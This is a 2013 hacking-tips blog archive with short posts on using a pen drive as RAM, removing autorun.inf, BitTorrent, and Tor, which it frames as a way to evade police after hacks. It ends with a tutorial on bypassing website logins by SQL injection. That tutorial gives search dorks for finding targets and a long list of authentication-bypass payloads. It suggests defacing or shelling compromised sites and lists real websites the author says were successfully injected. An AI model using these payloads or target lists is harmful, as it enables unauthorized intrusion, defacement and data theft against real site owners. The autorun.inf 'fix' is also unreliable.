Saturday, 22 June 2013

Pen Drive As RAM



How to Use Pen Drive As RAM
For XP
Insert your pen-drive. Let your PC read it.(Minimum 2 GB)

Right click on My Computer.

Click on Properties from context menu.
Click on Advanced tab.
Click on Settings under Performance.
Click on Advanced tab.
Click on Change button under Virtual memory.
Select your USB drive.
Click on custom size radio button and give the values as follows;
Initial Size:1020
Maximum size:1020
The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size.
Click on Set button, then click on OK.
Now you have to restart the computer. The speed of your computer will be increase


For Windows 7

Plug in your pendrive-> Format with NTFS or FAT32
Now go to properties->Select ReadyBoost
Check Use this device->Choose maximum space to reserve system speed
Click on Apply and OK. Your readyboost PenDrive is ready Now to Use.
Here is an personal suggestion HP and Sandisk is the Best for this work so what are you waiting for.

How to Remove Autorun.inf


How to Remove Autorun.inf Virus from Pendrive Easily – Without Antivirus!

I have heard many peoples suffering from autorun.inf virus that is the major problem of the windows xp users
Anyway, As we know Our Antivirus (Basically, Avira, Avast, AVG, etc), Only detects Virus i.e autorun.inf whenever you insert your removable disk (Pen Drives). But our AntiVirus can’t disinfect it nor delete it.

Hmm, the autorun.inf is hidden and it can’t be remove or disinfected by Anti virus.
I have a Funny tutorial for you all through which you all can get Rid from this Virus without any Antivirus:

1. Open Notepad
2. Do not write anything in it.
3. Save as (any where in PC i.e Desktop) with name “autorun.inf”
4. Copy and paste in your “Pen Drives”
5. Remove your drive then insert again, it will open normally

How Torrent Works



How Torrent Works

BitTorrent
BitTorrent is a protocol that enables fast downloading of large files using minimum Internet bandwidth. It costs nothing to use and includes no spyware or pop-up advertising.

Unlike other download methods, BitTorrent maximizes transfer speed by gathering pieces of the file you want and downloading these pieces simultaneously from people who already have them. This process makes popular and very large files, such as videos and television programs, download much faster than is possible with other protocols.


BitTorrent Speak
Like most Internet phenomena, BitTorrent has its own jargon. Some of the more common terms related to BitTorrent include:

* Leeches - People who download files but do not share files on their own computer with others

* Seed or seeder - A computer with a complete copy of a BitTorrent file (At least one seed computer is necessary for a BitTorrent download to operate.)

* Swarm - A group of computers simultaneously sending (uploading) or receiving (downloading) the same file

* .torrent - A pointer file that directs your computer to the file you want to download

* Tracker - A server that manages the BitTorrent file-transfer process

Here's how it works:

BitTorrent's peer-to-peer download process

* You open a Web page and click on a link for the file you want.

* BitTorrent client software communicates with a tracker to find other computers running BitTorrent that have the complete file (seed computers) and those with a portion of the file (peers that are usually in the process of downloading the file).

* The tracker identifies the swarm, which is the connected computers that have all of or a portion of the file and are in the process of sending or receiving it.

* The tracker helps the client software trade pieces of the file you want with other computers in the swarm. Your computer receives multiple pieces of the file simultaneously.

* If you continue to run the BitTorrent client software after your download is complete, others can receive .torrent files from your computer; your future download rates improve because you are ranked higher in the "tit-for-tat" system.

Downloading pieces of the file at the same time helps solve a common problem with other peer-to-peer download methods: Peers upload at a much slower rate than they download. By downloading multiple pieces at the same time, the overall speed is greatly improved. The more computers involved in the swarm, the faster the file transfer occurs because there are more sources of each piece of the file. For this reason, BitTorrent is especially useful for large, popular files.- See more at:

Stay Anonymous using TOR



Hey guys.

In the past, there have been a few hacks that could be traced back by the police, because the hackers used VPN's.

The VPN providers gave the US goverment because of the patriot act all the information they wanted, so they can not really guarantee you to stay 100% Anonymous.

So as an alternative for VPNs to stay hidden, you can use TOR.

In this Tutorial, I will deal on how to do that.
The tutorial is seperated into these parts:

What is TOR and how does it work?
How do I Download and Install TOR?
How do I use TOR?




What is TOR and how does it work?
====================
TOR (The Onion Router)
is a network, that tunnels your traffic through a worldwide volunteer network of PC's.

That means, when you want to connect to a website using TOR, you wont connect directly, but you will connect first to another PC, which also connects to another PC etc.
This will happen a few times, while the connections are ecrypted.
after that, the last PC, the exitnode, will connect to the page you requested.

The server you connected to will only see the last one's IP address, so you stay hidden.

here is a small graphic:






How do I Download and Install TOR? 
=============================================
TOR can be downloaded here:
https://www.torproject.org/download/download

There you can Download the "Tor Browser Bundle"
Just pick your Language and OS.

When the Download has finished,
Just extract the date somewhere, using 7zip or winzip or whatever.

now, when done, just click the "start tor browser" application.
Yes! there is no Insstallation needed! great huh?

The Tor browser is basically a Firefox in a modified Aurora version.


=============================================

How do I use TOR? 
=============================================
Basically you can use TOR just as any other Web browser.
what I often do, is having one TOR and one usual Browser up, so for misc stuff i use tor and for things that need to be done quick i just use my normal firefox.

when you use TOR you will have to follow some rules, to stay hidden.

Want Tor to really work?

You need to change some of your habits, as some things won't work exactly as you are used to.
Use the Tor Browser

Tor does not protect all of your computer's Internet traffic when you run it. Tor only protects your applications that are properly configured to send their Internet traffic through Tor. To avoid problems with Tor configuration, we strongly recommend you use the Tor Browser Bundle. It is pre-configured to protect your privacy and anonymity on the web as long as you're browsing with the Tor Browser itself. Almost any other web browser configuration is likely to be unsafe to use with Tor.
Don't enable or install browser plugins

The Tor Browser will block browser plugins such as Flash, RealPlayer, Quicktime, and others: they can be manipulated into revealing your IP address. Similarly, we do not recommend installing additional addons or plugins into the Tor Browser, as these may bypass Tor or otherwise harm your anonymity and privacy. The lack of plugins means that Youtube videos are blocked by default, but Youtube does provide an experimental opt-in feature (enable it here) that works for some videos.
Use HTTPS versions of websites

Tor will encrypt your traffic to and within the Tor network, but the encryption of your traffic to the final destination website depends upon on that website. To help ensure private encryption to websites, the Tor Browser Bundle includes HTTPS Everywhere to force the use of HTTPS encryption with major websites that support it. However, you should still watch the browser URL bar to ensure that websites you provide sensitive information to display a blue or green URL bar button, include https:// in the URL, and display the proper expected name for the website.
Don't open documents downloaded through Tor while online

The Tor Browser will warn you before automatically opening documents that are handled by external applications. DO NOT IGNORE THIS WARNING. You should be very careful when downloading documents via Tor (especially DOC and PDF files) as these documents can contain Internet resources that will be downloaded outside of Tor by the application that opens them. This will reveal your non-Tor IP address. If you must work with DOC and/or PDF files, we strongly recommend either using a disconnected computer, downloading the free VirtualBox and using it with a virtual machine image with networking disabled, or using Tails. Under no circumstances is it safe to use BitTorrent and Tor together, however.
Use bridges and/or find company

Tor tries to prevent attackers from learning what destination websites you connect to. However, by default, it does not prevent somebody watching your Internet traffic from learning that you're using Tor. If this matters to you, you can reduce this risk by configuring Tor to use a Tor bridge relay rather than connecting directly to the public Tor network. Ultimately the best protection is a social approach: the more Tor users there are near you and the more diverse their interests, the less dangerous it will be that you are one of them. Convince other people to use Tor, too!

That's it.
have fun with TOR, and stay hidden!

====================

Thank you for reading!
please leave a comment

Tuesday, 11 June 2013

Bypassing Login pages on websites using SQL injectable queries

sql injection in 5 chapters

chapter 2 

Level: Beginners and Intermediate

Requirements: Patience and stradegy

Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.

Please visit Chapter 1 if you haven't seen it yet: http://htu-2.blogspot.com/2013/06/dork-for-sql-injection.html



What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:

==============================================

Username: admin
Password: ‘ or ‘1’=’1

==============================================
When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query

==============================================

SELECT * FROM users
WHERE username = ‘admin’
AND password = ‘ ‘ or ‘1’=’1’

==============================================

In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we


Step1: Finding websites with Login Pages

Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: 

In this tutorial, we can use these dorks:

==============================================
Code:

inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html

==============================================


Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases


===============================================
Code:

Username: admin
Password: ' or 0=0 --

===============================================
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.

==================================================
Code:

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

==================================================
=
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.


Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon
Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website







Extras:
Common Password Queries:

===============================================

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

===============================================
Here are some sites you can test on:


Code:

http://www.amskrupajal.org/AdminLogin.asp
http://www.csimatrichss.org/adminpage.asp
http://www.preventivecardiology.in/adminlogin.asp
http://pndllc.com/pndllc/admin/adminlogin.asp
http://www.singleusemedical.com/admin/adminLogin.asp
http://www.ringjordan.com/admin.asp
http://sunmarytrust.org/adminlogin.aspI tried injecting all of them and it worked, so it should work for you too